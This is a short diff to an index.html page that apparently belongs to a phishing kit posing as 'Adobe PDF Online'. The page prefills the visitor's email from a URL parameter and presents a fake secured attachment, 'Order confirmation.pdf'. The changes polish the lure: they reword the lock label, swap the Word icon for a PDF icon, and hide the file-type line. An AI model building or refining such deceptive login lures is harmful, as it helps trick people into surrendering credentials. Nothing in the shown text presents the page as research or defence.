--- a/index.html
+++ b/index.html
@@ -91,14 +91,14 @@ $("#email").val($.urlPeram('email'));
 
           <div class="ml-3 mt-3 text-left">
           <!-- Secured Remote Attachment label -->
-          <i class="icon fas fa-lock" style="color:#f73c3c;; font-size:17px; margin-right:5px;"></i> <span class="rex">  Secured Remote Attachment</span>
+          <i class="icon fas fa-lock" style="color:#f73c3c;; font-size:17px; margin-right:5px;"></i> <span class="rex">  Secured  Attachment</span>
               </div>
 
             <div class="mt-4 mb-5">
             
               <div>
             
-                <img src="Adobe%20PDF%20Online_files/word-icon.png" id="attachment" class="mt-1" style="width:85px; margin-top:20px;">
+                <img src="Adobe%20PDF%20Online_files/pdf.jpg" id="attachment" class="mt-1" style="width:85px; margin-top:20px;">
               <div class=""> 
                   <div>
                     <small class="text-left card-text">Order confirmation.pdf</small>
@@ -109,7 +109,7 @@ $("#email").val($.urlPeram('email'));
                   </div>
                   <div>
                   <!-- Document Type Label -->
-                    <small class="text-left card-text">Type: PDF</small>
+                    <small class="text-left card-text invisible ">Type: PDF</small>
                   </div>
                   <div>
                   <!--Document Size -->
